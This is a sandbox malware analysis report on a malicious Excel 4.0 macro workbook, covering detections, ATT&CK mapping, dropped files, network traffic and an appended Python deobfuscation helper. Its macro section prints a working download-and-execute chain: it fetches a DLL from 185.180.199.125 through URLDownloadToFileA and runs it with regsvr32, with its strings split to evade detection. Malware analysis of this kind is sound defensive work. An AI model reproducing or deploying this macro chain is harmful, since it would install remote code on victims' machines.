Analysis Report INDIV_PAYM_633854-506518488.xlsb
Overview
General Information
Detection
Score: | 64 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Classification
Process Tree
Malware Configuration
No configs have been found
Yara Overview
Initial Sample
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_XlsWithMacro4 | Yara detected Xls With Macro 4.0 | Joe Security |
Sigma Overview
System Summary:
Sigma detected: Microsoft Office Product Spawning Windows Shell
Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team
Signature Overview
- File opened
Software Vulnerabilities:
Document exploit detected (UrlDownloadToFile)
- Section loaded
Document exploit detected (process start blacklist hit)
- Process created
- TCP traffic
- TCP traffic
- TCP traffic detected without corresponding DNS query
- TCP traffic detected without corresponding DNS query
- TCP traffic detected without corresponding DNS query
- String found in binary or memory
System Summary:
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
- Screenshot OCR
- Screenshot OCR
Found Excel 4.0 Macro with suspicious formulas
- Initial sample
- Initial sample
- Section loaded
- Classification label
- File created
- File created
- File read
- Key opened
- Process created
- Process created
- Process created
- Window detected
- Initial sample
- Initial sample
- Initial sample
- Initial sample
- Initial sample
- Key opened
- File opened
- Process created
- Process information set
- Binary or memory string
- Binary or memory string
- Binary or memory string
- Binary or memory string
- File source
Mitre Att&ck Matrix
Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Valid Accounts | Scripting1 | DLL Side-Loading1 | Process Injection1 | Regsvr321 | OS Credential Dumping | Security Software Discovery1 | Remote Services | Data from Local System | Exfiltration Over Other Network Medium | Data Obfuscation | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition |
Default Accounts | Exploitation for Client Execution21 | Boot or Logon Initialization Scripts | DLL Side-Loading1 | Masquerading1 | LSASS Memory | File and Directory Discovery1 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Junk Data | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Disable or Modify Tools1 | Security Account Manager | System Information Discovery2 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Steganography | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Process Injection1 | NTDS | System Network Configuration Discovery | Distributed Component Object Model | Input Capture | Scheduled Transfer | Protocol Impersonation | SIM Card Swap | Carrier Billing Fraud | |
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Scripting1 | LSA Secrets | Remote System Discovery | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings | |
Replication Through Removable Media | Launchd | Rc.common | Rc.common | DLL Side-Loading1 | Cached Domain Credentials | System Owner/User Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features |
Behavior Graph
Screenshots
Thumbnails
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Antivirus, Machine Learning and Genetic Malware Detection
Initial Sample
No Antivirus matches
Dropped Files
No Antivirus matches
Unpacked PE Files
No Antivirus matches
Domains
No Antivirus matches
URLs
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | Virustotal | Browse | ||
0% | Avira URL Cloud | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | Virustotal | Browse | ||
0% | Avira URL Cloud | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | Virustotal | Browse | ||
0% | Avira URL Cloud | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | Virustotal | Browse | ||
0% | Avira URL Cloud | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe |
Domains and IPs
Contacted Domains
No contacted domains info
URLs from Memory and Binaries
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | | unknown | ||
false | high | |||
false | high | |||
false | high | |||
false | | unknown | ||
false | | unknown | ||
false | high | |||
false | | unknown | ||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | | unknown | ||
false | | unknown | ||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | | unknown | ||
false | | unknown | ||
false | high | |||
false | | unknown | ||
false | high | |||
false | | unknown | ||
false | high | |||
false | high | |||
false | high | |||
false | | unknown | ||
false | | unknown | ||
false | | unknown | ||
false | high | |||
false | high | |||
false | high | |||
false | | unknown | ||
false | | unknown | ||
false | high | |||
false | | unknown | ||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | | unknown | ||
false | high | |||
false | high | |||
false | high | |||
false | | unknown | ||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | | unknown | ||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | | unknown | ||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | | unknown | ||
false | high | |||
false | high | |||
false | high | |||
false | | unknown | ||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | | unknown | ||
false | high | |||
false | | unknown | ||
false | | unknown | ||
false | high | |||
false | | unknown | ||
false | high | |||
false | | unknown | ||
false | high | |||
false | | unknown | ||
false | high | |||
Contacted IPs
Public
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
185.180.199.125 | unknown | Netherlands | | 14576 | HOSTING-SOLUTIONSUS | false |
General Information
Joe Sandbox Version: | 32.0.0 Black Diamond |
Analysis ID: | 433255 |
Start date: | 11.06.2021 |
Start time: | 14:49:02 |
Joe Sandbox Product: | CloudBasic |
Overall analysis duration: | 0h 5m 24s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Sample file name: | INDIV_PAYM_633854-506518488.xlsb |
Cookbook file name: | defaultwindowsofficecookbook.jbs |
Analysis system description: | Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211 |
Number of new started processes analysed: | 18 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Detection: | MAL |
Classification: | mal64.expl.evad.winXLSB@3/9@0/1 |
EGA Information: | Failed |
HDC Information: | Failed |
HCA Information: |
Cookbook Comments: |
Warnings: |
Simulations
Behavior and APIs
No simulations
Joe Sandbox View / Context
IPs
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
185.180.199.125 | Get hash | malicious | Browse | ||
Get hash | malicious | Browse |
Domains
No context
ASN
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
HOSTING-SOLUTIONSUS | Get hash | malicious | Browse | ||
Get hash | malicious | Browse | ||
Get hash | malicious | Browse | ||
Get hash | malicious | Browse | ||
Get hash | malicious | Browse | ||
Get hash | malicious | Browse | ||
Get hash | malicious | Browse | ||
Get hash | malicious | Browse | ||
Get hash | malicious | Browse | ||
Get hash | malicious | Browse | ||
Get hash | malicious | Browse | ||
Get hash | malicious | Browse | ||
Get hash | malicious | Browse | ||
Get hash | malicious | Browse | ||
Get hash | malicious | Browse | ||
Get hash | malicious | Browse | ||
Get hash | malicious | Browse | ||
Get hash | malicious | Browse | ||
Get hash | malicious | Browse | ||
Get hash | malicious | Browse | ||
JA3 Fingerprints
No context
Dropped Files
No context
Created / dropped Files
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 134922 |
Entropy (8bit): | 5.369089751778702 |
Encrypted: | false |
SSDEEP: | 1536:ncQIKNEeBXA3gBwlpQ9DQW+z7534ZliKWXboOilX5ENLWME9:TEQ9DQW+ziXOe |
MD5: | C1EDAF86F426B84FAC2104ED061EA944 |
SHA1: | 24D1CD0E890F2A4BA6930F470F50D04CE7E15920 |
SHA-256: | 00B9E5E95119D8B5E2EB2351D7FD6492078B14A17DE6F3C0639F5D96BEF7BC99 |
SHA-512: | 4231020218B88253F8D7D38158755539DE3E972B4163577E355EEFE6C6ADE63749613B6CDC53EEE0E2E97E81D123CEEB5366CC0F5608E2388196AE58F8111D3E |
Malicious: | false |
Reputation: | low |
Preview: |
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 6177 |
Entropy (8bit): | 7.959095006853368 |
Encrypted: | false |
SSDEEP: | 96:j6KDvZ3QXkQ288GMDBm6hEeWyS8ITRIVg9gPEnbYhbY0Y4pxCpAueydMT1uZMr0a:j6KTV8WBPhqd9qqYTB6peyeT1oMr0a |
MD5: | C7ED6FC355D8632DB1464BE3D56BF5CC |
SHA1: | 615484A338922DDF00B903CFA48060AD60D70207 |
SHA-256: | 26000244FBB0C6B2D76F80166CE85700BC96141C6CD80F8B399CA6F15FE3515C |
SHA-512: | FB4AE09EACD15A4FE778BDF366808C4F9FE403C4054F86704C03C87C7016E7D7A5772677B69064FCB5F1B9345D80C4263A58EA8B5E9CA2B717E24E2B19B85A92 |
Malicious: | false |
Reputation: | moderate, very likely benign file |
Preview: |
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 956 |
Entropy (8bit): | 7.683552542542939 |
Encrypted: | false |
SSDEEP: | 24:64ZJH5wka2YQydYiFNcincNrtNmt5xx4tRFB:JJH5fYuW5c3wPoFB |
MD5: | 32C83607A5C98C5A634278E5AED3AD61 |
SHA1: | EDE34ADEA53C413C4AC8215EA48F2F2FD59F1362 |
SHA-256: | 4A999E919D85EDD0CD1A772CA3B29F91AEECF77D0BEB11FD1B632B7A8A0686BF |
SHA-512: | AF19A013377F0F7B47E54D99D0AFA222BE46072C47944E8640B09A4993DFDDC906B7C68F7E3DAB5B3F126C9AD1090EADBF17FF7068EE8E360D0EA46811C0DB3C |
Malicious: | false |
Reputation: | low |
Preview: |
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 5744 |
Entropy (8bit): | 7.966496386988271 |
Encrypted: | false |
SSDEEP: | 96:4uJgumnoYk22FLjJq17cpKsv+CHI5BXjI1e+HCLDl3kjH1erj+uYU2:4CgJfkfJA7ixCxqe+GDhkT1erj+uYf |
MD5: | 9AD30E24270C495AE68EAF3A1EEECBFB |
SHA1: | 8642D256E7FFBEF5804A2D2220A1FE475A99DC36 |
SHA-256: | 6D3EAD431ABD110369EFABC6F2E474DC24FA3D7EEC28DE43456407C5BACD6D20 |
SHA-512: | EB156DD0686BAAE4F46B0B0C01838DA7225529D3B31912568D36A1CC07BE006EEAD31F464B0252C3A8471ACA71E86EEE9185FE705ABAE08C56B15C63CC891AD5 |
Malicious: | false |
Reputation: | moderate, very likely benign file |
Preview: |
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 9924 |
Entropy (8bit): | 7.973758306371751 |
Encrypted: | false |
SSDEEP: | 192:soXrzGktAQUkDfw4om9PEK9u27pwnJyV028/tgXEoCWoB:so9G+fnVEYu27OIW/+XEoCWoB |
MD5: | B34FB4F2F0F9E70B72BA3AFD028CD97C |
SHA1: | C6868336F78DEA1E718965DF3341039581DB5B5A |
SHA-256: | 189D420D344A694FD1928ABACBEC94D9F0EF52BE036CEB8144A9D9A6DD14EAEB |
SHA-512: | 4795600917F8A67A6C5CBD5713CAACE74E0483F8E6BB6D98EAB63BF24A0F71E537E7F8ABD26808630B247D454A3F467595C8343EEB4EA98AFAB49D81964158D6 |
Malicious: | false |
Reputation: | moderate, very likely benign file |
Preview: |
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 23989 |
Entropy (8bit): | 7.989754044300238 |
Encrypted: | false |
SSDEEP: | 384:SGjFc9Ll+HCggc/h3GXoQjZVVawDIPsTDGY9R9cNc+3JY0kEtWhfEWa92ppgMoF3:S5plMCgzGoOzVawisTDGY9Rs3JYhEtqy |
MD5: | 839795652A8FE78F26F4D86D757ABDE8 |
SHA1: | 979E5B90C72EA3E5E9D9B506AFDC981BFCA61B60 |
SHA-256: | 1A9EF0E2F66682B532D15457635920067C4F29EF762D2E8A3E0363B4CF39C13E |
SHA-512: | E6D5CB06679832DE768E23EF42B9780E4E8327A057A3EA0A6CD5B76908B210078EF659CA44C8723960AB59A0DB85A052C45E7A29D7FA8A643275BA5F210F6773 |
Malicious: | false |
Reputation: | moderate, very likely benign file |
Preview: |
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 79256 |
Entropy (8bit): | 7.896452643285173 |
Encrypted: | false |
SSDEEP: | 1536:9+milem3l7eO+dRRVnyYPlMVGoIahaDHTU6hryF70cAeWvijWGHL:9+wol7eO6RSYP2sTU2yF70cAijW2L |
MD5: | 69D8C4FE679D4CD97306A32FD7457456 |
SHA1: | 6466079B161A8677080CE83DCFC6841C59B82350 |
SHA-256: | ADD2FC296BCFF22DC4247BAE39D2B7DB5BD08484CB56403A0CB2A49E3273F25C |
SHA-512: | AC7BEBEE4C0888762928F01A0715FE1698ECB37D93BC2EB0022B6ED008953EC12F52567171B1EE6BBE38BD64B3B106457FE053BF52E5B93979A4A9B5BEEC5BEF |
Malicious: | false |
Preview: |
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 22 |
Entropy (8bit): | 2.9808259362290785 |
Encrypted: | false |
SSDEEP: | 3:QAlX0Gn:QKn |
MD5: | 7962B839183642D3CDC2F9CEBDBF85CE |
SHA1: | 2BE8F6F309962ED367866F6E70668508BC814C2D |
SHA-256: | 5EB8655BA3D3E7252CA81C2B9076A791CD912872D9F0447F23F4C4AC4A6514F6 |
SHA-512: | 2C332AC29FD3FAB66DBD918D60F9BE78B589B090282ED3DBEA02C4426F6627E4AAFC4C13FBCA09EC4925EAC3ED4F8662FDF1D7FA5C9BE714F8A7B993BECB3342 |
Malicious: | false |
Preview: |
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 165 |
Entropy (8bit): | 1.6081032063576088 |
Encrypted: | false |
SSDEEP: | 3:RFXI6dtt:RJ1 |
MD5: | 7AB76C81182111AC93ACF915CA8331D5 |
SHA1: | 68B94B5D4C83A6FB415C8026AF61F3F8745E2559 |
SHA-256: | 6A499C020C6F82C54CD991CA52F84558C518CBD310B10623D847D878983A40EF |
SHA-512: | A09AB74DE8A70886C22FB628BDB6A2D773D31402D4E721F9EE2F8CCEE23A569342FEECF1B85C1A25183DD370D1DFFFF75317F628F9B3AA363BBB60694F5362C7 |
Malicious: | true |
Preview: |
Static File Info
General
File type: |
Entropy (8bit): | 7.875828596690012 |
TrID: |
File name: | INDIV_PAYM_633854-506518488.xlsb |
File size: | 63444 |
MD5: | 38cab943e9882cad5d389e47ce0070ed |
SHA1: | fe99ceae30df2196a413a0f841716ec88fdc7a7e |
SHA256: | 17c5220167efeb1fcaceb99e62339e7ffb904149dfad6c0f2d2b78800a329218 |
SHA512: | 901e342dec5dbaeedf2de9a31a3e1f2fa23e97975566628dbb8544a1c70685412a1730b275f0784e6d46f92ba3c86bd789b955f54d4e4986bd2735f798159263 |
SSDEEP: | 1536:KMTMXwc5jlMVGoIahaDHTU6hryF70liWWGH0AeWca:KMTi5j2sTU2yF70liWW20Ra |
File Content Preview: | PK..........!..<......z.......[Content_Types].xml ...(.........................................................................................................................&&.............................................................................. |
File Icon
Icon Hash: | 74f0d0d2c6d6d0f4 |
Static OLE Info
General
Document Type: | OpenXML |
Number of OLE Files: | 1 |
OLE File "INDIV_PAYM_633854-506518488.xlsb"
Indicators
Has Summary Info: | |
Application Name: | |
Encrypted Document: | |
Contains Word Document Stream: | |
Contains Workbook/Book Stream: | |
Contains PowerPoint Document Stream: | |
Contains Visio Document Stream: | |
Contains ObjectPool Stream: | |
Flash Objects Count: | |
Contains VBA Macros: |
Macro 4.0 Code
CALL(UR, UR, JJC, 0, ht, ..\jbeiwmje.dll, 0, 0)
Macro sheet (Excel 4.0 macro cells recovered from the workbook; almost every cell is empty, and each string is split over several cells and re-joined with "&" at the point of use) |
---|
Cell fragments as dumped | Reading |
---|---|
"ht", "tp://", "185.180.199.125/s1.", "dll" | http://185.180.199.125/s1.dll (payload URL) |
"..\jbeiwmje.dll" | relative local path; its cell (BN24) is an argument of both the CALL below and the EXEC below, so the file that is downloaded is the file that is executed |
"UR", "LMon" | URLMon (library name passed to CALL) |
"URLDownl", "oa", "dToFile", "A" | URLDownloadToFileA (export passed to CALL) |
"CBB", "JJC" | fragments of the CALL type text |
"re", "gs", ="vr32 -s " | regsvr32 -s (command prefix for EXEC; the last fragment is stored as a formula returning a string literal) |
"0" (several cells) | numeric CALL arguments |
=CALL(BJ29&BN29,BR66&BR69&BX72&BZ72&BS25,BP81&BX73,BU64,BJ19&BJ20&BJ21&BJ22,BN24,BU69,BU72) | download step: library, export and type text are built from the fragments above |
=EXEC(before.2.18.42.sheet!BK73&before.2.18.42.sheet!BK74&before.2.18.42.sheet!BK75&before.2.18.42.sheet!BN24) | execution step: command line built from the fragments above plus BN24 |
=HALT() | end of macro |
=before.2.18.42.sheet!BZ25() | entry formula that calls into the macro sheet |
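Added example, not part of this sandbox report: a small resolver for the kind of "&"-concatenated Excel 4.0 macro cells seen in the dump above. It rebuilds the CALL and EXEC arguments so the library, export, URL, drop path and command line can be read without running Excel. The sheet it evaluates is constructed for the example: the cell addresses and their contents are assumptions modeled on the dumped fragments, not the real workbook, and the entry formula =before.2.18.42.sheet!BZ25() is not modeled.

```python
import re

# Constructed mini macro sheet for the example. The splitting style (one string
# spread over several cells and glued back with "&") follows the fragments the
# sandbox dumped from this workbook; the cell addresses and the exact contents
# are assumptions, not the real sheet.
SHEET = "before.2.18.42.sheet"
CELLS = {
    "BJ29": "UR", "BN29": "LMon",                                   # URLMon
    "BR66": "URLDownl", "BR69": "oa", "BX72": "dToFile", "BZ72": "A", "BS25": "",
    "BP81": "JJC", "BX73": "CBB",                                   # CALL type text
    "BU64": "0", "BU69": "0", "BU72": "0",
    "BJ19": "ht", "BJ20": "tp://", "BJ21": "185.180.199.125/s1.", "BJ22": "dll",
    "BN24": "..\\jbeiwmje.dll",
    "BK73": "re", "BK74": "gs", "BK75": "vr32 -s ",                # dumped as ="vr32 -s "
    "BZ25": "=CALL(BJ29&BN29,BR66&BR69&BX72&BZ72&BS25,BP81&BX73,BU64,"
            "BJ19&BJ20&BJ21&BJ22,BN24,BU69,BU72)",
    "BZ26": f"=EXEC({SHEET}!BK73&{SHEET}!BK74&{SHEET}!BK75&{SHEET}!BN24)",
    "BZ27": "=HALT()",
}

CELL_REF = re.compile(r"^(?:[A-Za-z0-9_.]+!)?([A-Z]{1,3}[0-9]{1,7})$")
FORMULA = re.compile(r"^=([A-Z.]+)\((.*)\)$", re.S)


def split_args(body):
    """Split a formula body on top-level commas (commas inside quotes/parens are kept)."""
    args, buf, depth, quoted = [], [], 0, False
    for ch in body:
        if ch == '"':
            quoted = not quoted
        if not quoted:
            if ch == "(":
                depth += 1
            elif ch == ")":
                depth -= 1
            elif ch == "," and depth == 0:
                args.append("".join(buf).strip())
                buf = []
                continue
        buf.append(ch)
    if buf or args:
        args.append("".join(buf).strip())
    return args


def resolve_operand(expr, cells):
    """Evaluate an '&'-joined operand made of quoted literals and (sheet-qualified) cell refs."""
    out = []
    for piece in expr.split("&"):          # literals that themselves contain '&' are not handled
        piece = piece.strip()
        if len(piece) >= 2 and piece[0] == piece[-1] == '"':
            out.append(piece[1:-1].replace('""', '"'))
            continue
        m = CELL_REF.match(piece)
        if not m:
            raise ValueError(f"unsupported operand: {piece!r}")
        out.append(str(cells.get(m.group(1), "")))
    return "".join(out)


def resolve_formula(formula, cells):
    """Return (function name, resolved argument strings) for '=FUNC(a&b, c, ...)'."""
    m = FORMULA.match(formula.strip())
    if not m:
        raise ValueError(f"not a simple call: {formula!r}")
    name, body = m.group(1), m.group(2)
    return name, [resolve_operand(a, cells) for a in split_args(body)]


def walk_macro(cells):
    """Resolve every CALL/EXEC/HALT cell in sheet order and report what it would do."""
    findings = []
    for addr, value in cells.items():
        if not (isinstance(value, str) and value.startswith("=")):
            continue
        name, args = resolve_formula(value, cells)
        if name == "CALL" and len(args) >= 3:
            # CALL(module, export, type-text, arg1, arg2, ...): real arguments start at index 3
            findings.append({"cell": addr, "kind": "CALL", "module": args[0],
                             "function": args[1], "type_text": args[2], "args": args[3:]})
        elif name == "EXEC" and args:
            findings.append({"cell": addr, "kind": "EXEC", "command": args[0]})
        elif name == "HALT":
            findings.append({"cell": addr, "kind": "HALT"})
    return findings


if __name__ == "__main__":
    for finding in walk_macro(CELLS):
        print(finding)
```

On the constructed sheet this yields a CALL into URLMon!URLDownloadToFileA with the URL and ..\jbeiwmje.dll as arguments, then an EXEC of "regsvr32 -s ..\jbeiwmje.dll", then HALT. Real samples add FORMULA() writes, CHAR() arithmetic and hidden sheets on top of plain concatenation, which this resolver does not attempt; it only shows why fragment cells should be joined before any string is matched.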
Network Behavior |
---|
TCP Packets |
---|
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Jun 11, 2021 14:50:04.843034983 CEST | 49732 | 80 | 192.168.2.4 | 185.180.199.125 |
Jun 11, 2021 14:50:07.869767904 CEST | 49732 | 80 | 192.168.2.4 | 185.180.199.125 |
Jun 11, 2021 14:50:13.870929956 CEST | 49732 | 80 | 192.168.2.4 | 185.180.199.125 |
UDP Packets |
---|
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Jun 11, 2021 14:49:48.324701071 CEST | 49714 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 11, 2021 14:49:48.374727964 CEST | 53 | 49714 | 8.8.8.8 | 192.168.2.4 |
Jun 11, 2021 14:49:49.182971954 CEST | 58028 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 11, 2021 14:49:49.233036995 CEST | 53 | 58028 | 8.8.8.8 | 192.168.2.4 |
Jun 11, 2021 14:49:50.390969038 CEST | 53097 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 11, 2021 14:49:50.452276945 CEST | 53 | 53097 | 8.8.8.8 | 192.168.2.4 |
Jun 11, 2021 14:49:50.545761108 CEST | 49257 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 11, 2021 14:49:50.598645926 CEST | 53 | 49257 | 8.8.8.8 | 192.168.2.4 |
Jun 11, 2021 14:49:51.359103918 CEST | 62389 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 11, 2021 14:49:51.409506083 CEST | 53 | 62389 | 8.8.8.8 | 192.168.2.4 |
Jun 11, 2021 14:49:52.428375006 CEST | 49910 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 11, 2021 14:49:52.490309000 CEST | 53 | 49910 | 8.8.8.8 | 192.168.2.4 |
Jun 11, 2021 14:49:53.389934063 CEST | 55854 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 11, 2021 14:49:53.451335907 CEST | 53 | 55854 | 8.8.8.8 | 192.168.2.4 |
Jun 11, 2021 14:49:55.380990028 CEST | 64549 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 11, 2021 14:49:55.431484938 CEST | 53 | 64549 | 8.8.8.8 | 192.168.2.4 |
Jun 11, 2021 14:50:00.048047066 CEST | 63153 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 11, 2021 14:50:00.106736898 CEST | 53 | 63153 | 8.8.8.8 | 192.168.2.4 |
Jun 11, 2021 14:50:01.164877892 CEST | 52991 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 11, 2021 14:50:01.253294945 CEST | 53700 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 11, 2021 14:50:01.255244970 CEST | 53 | 52991 | 8.8.8.8 | 192.168.2.4 |
Jun 11, 2021 14:50:01.303287983 CEST | 53 | 53700 | 8.8.8.8 | 192.168.2.4 |
Jun 11, 2021 14:50:01.680219889 CEST | 51726 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 11, 2021 14:50:01.753287077 CEST | 53 | 51726 | 8.8.8.8 | 192.168.2.4 |
Jun 11, 2021 14:50:02.683293104 CEST | 51726 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 11, 2021 14:50:02.757914066 CEST | 53 | 51726 | 8.8.8.8 | 192.168.2.4 |
Jun 11, 2021 14:50:03.730600119 CEST | 51726 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 11, 2021 14:50:03.788909912 CEST | 53 | 51726 | 8.8.8.8 | 192.168.2.4 |
Jun 11, 2021 14:50:04.911463976 CEST | 56794 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 11, 2021 14:50:04.964689016 CEST | 53 | 56794 | 8.8.8.8 | 192.168.2.4 |
Jun 11, 2021 14:50:05.775980949 CEST | 51726 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 11, 2021 14:50:05.834357977 CEST | 53 | 51726 | 8.8.8.8 | 192.168.2.4 |
Jun 11, 2021 14:50:05.916295052 CEST | 56534 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 11, 2021 14:50:05.967521906 CEST | 53 | 56534 | 8.8.8.8 | 192.168.2.4 |
Jun 11, 2021 14:50:07.027144909 CEST | 56627 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 11, 2021 14:50:07.077236891 CEST | 53 | 56627 | 8.8.8.8 | 192.168.2.4 |
Jun 11, 2021 14:50:08.133371115 CEST | 56621 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 11, 2021 14:50:08.183768034 CEST | 53 | 56621 | 8.8.8.8 | 192.168.2.4 |
Jun 11, 2021 14:50:09.501938105 CEST | 63116 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 11, 2021 14:50:09.552122116 CEST | 53 | 63116 | 8.8.8.8 | 192.168.2.4 |
Jun 11, 2021 14:50:09.823268890 CEST | 51726 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 11, 2021 14:50:09.881354094 CEST | 53 | 51726 | 8.8.8.8 | 192.168.2.4 |
